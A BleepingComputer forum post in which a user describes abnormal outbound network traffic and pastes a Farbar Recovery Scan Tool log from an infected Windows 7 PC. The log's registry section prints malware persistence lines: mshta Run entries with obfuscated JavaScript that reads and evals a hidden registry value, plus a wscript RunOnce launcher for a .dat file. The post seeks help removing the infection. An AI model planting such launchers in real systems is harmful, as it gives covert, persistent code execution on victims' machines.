Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Tons of network traffic...


  • This topic is locked This topic is locked
3 replies to this topic

#1 kcross

kcross

  • Members
  • 1 posts
  • OFFLINE
  •  
  • Local time:12:37 AM

Posted 30 March 2016 - 07:47 AM

I have a computer that is experiencing much higher than expected network activity. Over the course of a 6 hour period, it received 1.7 GB of data and sent 300 GB; this is actually a mild sample of the last months issues. We have had the computer use as much as two gigs in an hour. It will use data whether people are working on it or not, as long as the computer is powered on.

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:05-03-2016 01

Ran by lks (administrator) on HANDSINHARMONY (30-03-2016 08:29:38)
Running from C:\Users\lks\Desktop
Loaded Profiles: lks & QBDataServiceUser22 (Available Profiles: lks & Lara & QBDataServiceUser22 & Guest)
Platform: Windows 7 Home Premium Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Opera)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Webroot Software, Inc. ) C:\Program Files (x86)\Webroot\WebrootSecurity\WRConsumerService.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(ArcSoft Inc.) C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACService.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Small Business\Business Contact Manager\BcmSqlStartupSvc.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(SEIKO EPSON CORPORATION) C:\Program Files (x86)\EPSON Projector\EPSON USB Display V1.4\EMP_UDSA.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe
(Intuit) C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe
(Intuit Inc.) C:\Program Files (x86)\Common Files\Intuit\DataProtect\QBIDPService.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler64.exe
(Microsoft Corporation) C:\Windows\System32\GWX\GWX.exe
(CyberLink) C:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\Kernel\CLML\CLMLSvc.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft SQL Server\90\Shared\sqlbrowser.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(Webroot Software, Inc. (www.webroot.com)) C:\Program Files (x86)\Webroot\WebrootSecurity\SpySweeper.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
() C:\Program Files (x86)\NETGEAR\WNA3100M\WifiSvc.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Program Files (x86)\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
(Intuit, Inc.) C:\Program Files (x86)\Intuit\QuickBooks 2012\QBDBMgrN.exe
(Hewlett-Packard Co.) C:\Program Files\HP\HP Photosmart 6510 series\Bin\ScanToPCActivationApp.exe
(Hewlett-Packard Co.) C:\Program Files\HP\HP Officejet Pro 8610\Bin\ScanToPCActivationApp.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Hewlett-Packard Co.) C:\Program Files\HP\HP Officejet Pro 8610\Bin\HPNetworkCommunicatorCom.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\HP Odometer\hpsysdrv.exe
(Hewlett-Packard Co.) C:\Program Files (x86)\hp\Digital Imaging\bin\hpqtra08.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\HP Remote Solution\HP_Remote_Solution.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\HP Health Check\HPHC_Service.exe
(ArcSoft Inc.) C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACDaemon.exe
(Intuit Inc.) C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBUpdate\qbupdate.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(ArcSoft Inc.) C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ArcCon.ac
(Intuit Inc.) C:\Program Files (x86)\Intuit\QuickBooks 2012\QBW32.EXE
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
(APN LLC.) C:\Users\lks\AppData\Local\VNT\vntldr.exe
() C:\Program Files (x86)\PdaNet for iPhone\PdaNetPC.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\tv_w32.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\tv_x64.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Hewlett-Packard Co.) C:\Program Files (x86)\hp\Digital Imaging\bin\hpqste08.exe
(Hewlett-Packard Co.) C:\Program Files (x86)\hp\Digital Imaging\bin\hpqbam08.exe
(Hewlett-Packard) C:\Program Files (x86)\hp\Digital Imaging\bin\hpqgpc01.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\avastui.exe
(Opera Software) C:\Program Files (x86)\Opera\36.0.2130.32\opera.exe
(Opera Software) C:\Program Files (x86)\Opera\36.0.2130.32\opera_crashreporter.exe
(Opera Software) C:\Program Files (x86)\Opera\36.0.2130.32\opera.exe
(Opera Software) C:\Program Files (x86)\Opera\36.0.2130.32\opera.exe
(Opera Software) C:\Program Files (x86)\Opera\36.0.2130.32\opera.exe
(Opera Software) C:\Program Files (x86)\Opera\36.0.2130.32\opera.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Opera Software) C:\Program Files (x86)\Opera\36.0.2130.32\opera.exe
(Opera Software) C:\Program Files (x86)\Opera\36.0.2130.32\opera.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Desktop.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
 
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [NvCplDaemon] => "RUNDLL32.EXE" C:\Windows\system32\NvCpl.dll,NvStartup
HKLM\...\Run: [PC-Doctor for Windows localizer] => C:\Program Files\PC-Doctor for Windows\localizer.exe [95728 2009-09-17] (PC-Doctor, Inc.)
HKLM-x32\...\Run: [hpsysdrv] => c:\program files (x86)\hewlett-packard\HP odometer\hpsysdrv.exe [62768 2008-11-20] (Hewlett-Packard)
HKLM-x32\...\Run: [HP Remote Solution] => "%ProgramFiles%\Hewlett-Packard\HP Remote Solution\HP_Remote_Solution.exe"
HKLM-x32\...\Run: [F5D7050v3] => C:\Program Files (x86)\Belkin\F5D7050v3\Belkinwcui.exe
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2010-09-08] (Apple Inc.)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43816 2014-07-31] (Apple Inc.)
HKLM-x32\...\Run: [EPSON_UD_START] => C:\Program Files (x86)\EPSON Projector\EPSON USB Display V1.4\EMP_UD.exe [329632 2009-04-15] (SEIKO EPSON CORPORATION)
HKLM-x32\...\Run: [ArcSoft Connection Service] => C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACDaemon.exe [207360 2010-03-18] (ArcSoft Inc.)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-09-01] (Apple Inc.)
HKLM-x32\...\Run: [VNT] => C:\Program Files (x86)\VNT\vntldr.exe [196504 2014-10-08] (APN LLC.)
HKLM-x32\...\Run: [Intuit SyncManager] => C:\Program Files (x86)\Common Files\Intuit\Sync\IntuitSyncManager.exe [3776824 2015-02-27] (Intuit Inc. All rights reserved.)
HKLM-x32\...\Run: [SDTray] => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe [4101576 2014-06-24] (Safer-Networking Ltd.)
HKLM-x32\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvastUI.exe [7139256 2016-03-28] (AVAST Software)
HKLM-x32\...\RunOnce: [Hateg] => C:\Windows\SysWOW64\wscript.exe /E:vbscript /B "C:\Users\lks\AppData\Local\3AFDB6~1\Nonole.dat"
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
HKU\S-1-5-21-2968691658-935218191-2636090816-1000\...\Run: [HPADVISOR] => "C:\Program Files (x86)\Hewlett-Packard\HP Advisor\HPAdvisor.exe" view=DOCKVIEW
HKU\S-1-5-21-2968691658-935218191-2636090816-1000\...\Run: [HP Photosmart 6510 series (NET)] => C:\Program Files\HP\HP Photosmart 6510 series\Bin\ScanToPCActivationApp.exe [2676584 2011-09-16] (Hewlett-Packard Co.)
HKU\S-1-5-21-2968691658-935218191-2636090816-1000\...\Run: [HP Officejet Pro 8610 (NET)] => C:\Program Files\HP\HP Officejet Pro 8610\Bin\ScanToPCActivationApp.exe [3485728 2013-09-11] (Hewlett-Packard Co.)
HKU\S-1-5-21-2968691658-935218191-2636090816-1000\...\Run: [GoogleChromeAutoLaunch_8482C840E7B248D15DCE412309E39D65] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [874136 2016-03-07] (Google Inc.)
HKU\S-1-5-21-2968691658-935218191-2636090816-1000\...\Run: [**0c912255<*>] => "mshta" javascript:WccLtFcz6="0a";U4M=new%20ActiveXObject("WScript.Shell");N6k4xSyl="jvs0Gg";MwcG0=U4M.RegRead("HKCU\\software\\edca4659dd\\a7af9d87");Z1WZZRJ8="vHgcMca";eval(MwcG0);vySi5xo="V1"; <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-2968691658-935218191-2636090816-1000\...\Run: [**cac689b3<*>] => "mshta" javascript:F8ZrXrLC="DFQpQUf";G2h=new%20ActiveXObject("WScript.Shell");yPOM1M2d="o5UzD";VYA2k=G2h.RegRead("HKCU\\software\\edca4659dd\\a7af9d87");bgq7k3zl="OZZcl";eval(VYA2k);Si3SgWirv="TvZU3T (the data entry has 3 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-2968691658-935218191-2636090816-1000\...\Run: [SpybotPostWindows10UpgradeReInstall] => C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe [1011200 2015-07-28] (Safer-Networking Ltd.)
HKU\S-1-5-21-2968691658-935218191-2636090816-1000\...\Run: [Spybot-S&D Cleaning] => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDCleaner.exe [4566952 2014-06-24] (Safer-Networking Ltd.)
HKU\S-1-5-21-2968691658-935218191-2636090816-1000\...\MountPoints2: J - J:\LaunchU3.exe -a
HKU\S-1-5-21-2968691658-935218191-2636090816-1000\...\MountPoints2: {2f7c99f5-7e37-11e5-83ef-4494fcf7cf0b} - J:\win\setup.exe -phs
HKU\S-1-5-21-2968691658-935218191-2636090816-1000\...\MountPoints2: {409c9333-9f5c-11e1-9e12-e0cb4e4040a5} - J:\EMP_UDSe.exe /autorun
HKU\S-1-5-21-2968691658-935218191-2636090816-1000\...\MountPoints2: {b39a9c2e-ec59-11e1-bb2f-e0cb4e4040a5} - K:\MI.exe
HKU\S-1-5-21-2968691658-935218191-2636090816-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> (None)
HKU\S-1-5-21-2968691658-935218191-2636090816-1013\...\Run: [HPADVISOR] => C:\Program Files (x86)\Hewlett-Packard\HP Advisor\HPAdvisor.exe autorun=AUTORUN
HKU\S-1-5-18\...\RunOnce: [SPReview] => C:\Windows\System32\SPReview\SPReview.exe [301568 2013-03-21] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2016-03-28] (AVAST Software)
ShellIconOverlayIdentifiers: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt4] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [GDriveSharedOverlay] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44} =>  No File
ShellIconOverlayIdentifiers-x32: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers-x32: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers-x32: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} =>  No File
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Adobe Reader Speed Launch.lnk [2010-02-05]
ShortcutTarget: Adobe Reader Speed Launch.lnk -> C:\Program Files (x86)\Adobe\Reader 8.0\Reader\reader_sl.exe (Adobe Systems Incorporated)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Adobe Reader Synchronizer.lnk [2010-02-05]
ShortcutTarget: Adobe Reader Synchronizer.lnk -> C:\Program Files (x86)\Adobe\Reader 8.0\Reader\AdobeCollabSync.exe ()
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HP Digital Imaging Monitor.lnk [2010-02-06]
ShortcutTarget: HP Digital Imaging Monitor.lnk -> C:\Program Files (x86)\hp\Digital Imaging\bin\hpqtra08.exe (Hewlett-Packard Co.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Intuit Data Protect.lnk [2011-11-22]
ShortcutTarget: Intuit Data Protect.lnk -> C:\Program Files (x86)\Common Files\Intuit\DataProtect\IntuitDataProtect.exe (Intuit Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Office.lnk [2010-02-06]
ShortcutTarget: Microsoft Office.lnk -> C:\Program Files (x86)\Microsoft Office\Office\OSA9.EXE (Microsoft Corporation)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\PictureMover.lnk [2009-12-02]
ShortcutTarget: PictureMover.lnk -> C:\Program Files (x86)\PictureMover\Bin\PictureMover.exe (Hewlett-Packard Company)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\QuickBooks Update Agent.lnk [2016-03-21]
ShortcutTarget: QuickBooks Update Agent.lnk -> C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBUpdate\qbupdate.exe (Intuit Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\QuickBooks_Standard_21.lnk [2016-03-21]
ShortcutTarget: QuickBooks_Standard_21.lnk -> C:\Program Files (x86)\Intuit\QuickBooks 2012\QBW32.EXE (Intuit Inc.)
Startup: C:\Users\Lara\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk [2013-01-31]
ShortcutTarget: Dropbox.lnk -> C:\Users\lks\AppData\Roaming\Dropbox\bin\Dropbox.exe (No File)
Startup: C:\Users\lks\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PdaNet Desktop.lnk [2012-02-06]
ShortcutTarget: PdaNet Desktop.lnk -> C:\Program Files (x86)\PdaNet for iPhone\PdaNetPC.exe ()
BootExecute: autocheck autochk * sdnclean64.exeSsiEfr.exe
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{0FC66A5A-01A3-4C5C-B90A-64A6855CA198}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{7313934B-ED4B-4D17-B931-327F97937B34}: [DhcpNameServer] 10.100.250.1
Tcpip\..\Interfaces\{EEA0BC06-78E3-47E3-84FF-17B4CFF84BEF}: [DhcpNameServer] 172.20.10.1
 
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkId=56626&homepage=hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkId=56626&homepage=hxxp://go.microsoft.com/fwlink/p/?LinkId=255141
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-2968691658-935218191-2636090816-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkId=56626&homepage=hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome
HKU\S-1-5-21-2968691658-935218191-2636090816-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPDSK/1
HKU\S-1-5-21-2968691658-935218191-2636090816-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-2968691658-935218191-2636090816-1000\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://ie.search.msn.com/{sub_rfc1766}/srchasst/srchasst.htm
HKU\S-1-5-21-2968691658-935218191-2636090816-1013\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkId=56626&homepage=hxxp://g.msn.com/HPDSK/1
HKU\S-1-5-21-2968691658-935218191-2636090816-1013\Software\Microsoft\Internet Explorer\Main,First Home Page = hxxp://g.msn.com/HPDSK/1
HKU\S-1-5-21-2968691658-935218191-2636090816-1013\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPDSK/1
SearchScopes: HKLM -> DefaultScope {9BB47C17-9C68-4BB3-B188-DD9AF0FD2406} URL = 
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM -> {675D5552-B597-4B08-A0CB-0C012EF428A4} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPDTDF&pc=HPDTDF&src=IE-SearchBox
SearchScopes: HKLM -> {D24DB0C7-C840-42A2-A803-B9C1122D44C6} URL = hxxp://www.ask.com/web?q={searchterms}&l=dis&o=ushpd
SearchScopes: HKLM -> {DC91FAFB-6CEA-49E5-BB74-9CEE75D09B77} URL = 
SearchScopes: HKLM-x32 -> DefaultScope {9BB47C17-9C68-4BB3-B188-DD9AF0FD2406} URL = 
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> {675D5552-B597-4B08-A0CB-0C012EF428A4} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPDTDF&pc=HPDTDF&src=IE-SearchBox
SearchScopes: HKLM-x32 -> {D24DB0C7-C840-42A2-A803-B9C1122D44C6} URL = hxxp://www.ask.com/web?q={searchterms}&l=dis&o=ushpd
SearchScopes: HKU\S-1-5-21-2968691658-935218191-2636090816-1000 -> {D24DB0C7-C840-42A2-A803-B9C1122D44C6} URL = hxxp://www.ask.com/web?q={searchterms}&l=dis&o=ushpd
SearchScopes: HKU\S-1-5-21-2968691658-935218191-2636090816-1000 -> {DC91FAFB-6CEA-49E5-BB74-9CEE75D09B77} URL = 
BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll [2016-03-28] (AVAST Software)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corp.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO-x32: HP Print Enhancer -> {0347C33E-8762-4905-BF09-768834316C61} -> C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\hpswp_printenhancer.dll [2009-09-23] (Hewlett-Packard Co.)
BHO-x32: Adobe PDF Reader Link Helper -> {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll [2006-10-23] (Adobe Systems Incorporated)
BHO-x32: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2016-03-28] (AVAST Software)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corp.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO-x32: Microsoft Live Search Toolbar Helper -> {d2ce3e00-f94a-4740-988e-03dc2f38c34f} -> c:\Program Files (x86)\MSN\Toolbar\3.0.0566.0\msneshellx.dll [2009-07-16] (Microsoft Corp.)
BHO-x32: HP Smart BHO Class -> {FFFFFFFF-CF4E-4F2B-BDC2-0E72E116A856} -> C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\hpswp_BHO.dll [2009-09-23] (Hewlett-Packard Co.)
Toolbar: HKLM-x32 - Microsoft Live Search Toolbar - {1E61ED7C-7CB8-49d6-B9E9-AB4C880C8414} - c:\Program Files (x86)\MSN\Toolbar\3.0.0566.0\msneshellx.dll [2009-07-16] (Microsoft Corp.)
Toolbar: HKU\S-1-5-21-2968691658-935218191-2636090816-1000 -> No Name - {604BC32A-9680-40D1-9AC6-E06B23A1BA4C} -  No File
DPF: HKLM-x32 {01113300-3E00-11D2-8470-0060089874ED} hxxps://activatemyfios.verizon.net/sdcCommon/download/FIOS/Verizon%20FiOS%20Installer.cab
DPF: HKLM-x32 {1851174C-97BD-4217-A0CC-E908F60D5B7A} hxxp://h20364.www2.hp.com/CSMWeb/Customer/cabs/HPISDataManager.CAB
Handler-x32: http - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [1999-12-02] (Microsoft Corporation)
Handler-x32: http - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [1999-12-02] (Microsoft Corporation)
Handler-x32: https - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [1999-12-02] (Microsoft Corporation)
Handler-x32: https - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [1999-12-02] (Microsoft Corporation)
Handler-x32: intu-help-qb5 - {867FCB77-9823-4cd6-8210-D85F968D466F} - C:\Program Files (x86)\Intuit\QuickBooks 2012\HelpAsyncPluggableProtocol.dll [2015-02-27] (Intuit, Inc.)
Handler-x32: ipp - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [1999-12-02] (Microsoft Corporation)
Handler-x32: msdaipp - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [1999-12-02] (Microsoft Corporation)
Handler-x32: msdaipp - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [1999-12-02] (Microsoft Corporation)
Handler-x32: qbwc - {FC598A64-626C-4447-85B8-53150405FD57} - C:\Windows\SysWOW64\mscoree.dll [2010-11-04] (Microsoft Corporation)
StartMenuInternet: IEXPLORE.EXE - iexplore.exe
 
FireFox:
========
FF ProfilePath: C:\Users\lks\AppData\Roaming\Mozilla\Firefox\Profiles\fex7biue.default
FF DefaultSearchEngine.US: Google
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-12] ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2014-05-06] ()
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-12] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~2\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=14.0.8081.0709 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2009-07-10] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-01] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-01] (Google Inc.)
FF Plugin HKU\S-1-5-21-2968691658-935218191-2636090816-1000: TorchVLC -> C:\Users\lks\AppData\Local\Torch\Plugins\Video\VLC\npvlc.dll [2013-07-30] (VideoLAN)
FF Plugin HKU\S-1-5-21-2968691658-935218191-2636090816-1013: @hulu.com/Hulu Desktop -> C:\Windows\..\Users\Default\AppData\Local\HuluDesktop\instances\0.9.9.1\npHDPlg.dll [2009-10-27] (Hulu LLC)
FF HKLM\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF Extension: Avast Online Security - C:\Program Files\AVAST Software\Avast\WebRep\FF [2016-03-28]
FF HKLM-x32\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3
FF Extension: HP Smart Web Printing - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3 [2010-02-06] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [quickprint@hp.com] - C:\Program Files (x86)\Hewlett-Packard\SmartPrint\QPExtension
FF Extension: SmartPrintButton - C:\Program Files (x86)\Hewlett-Packard\SmartPrint\QPExtension [2011-01-26] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
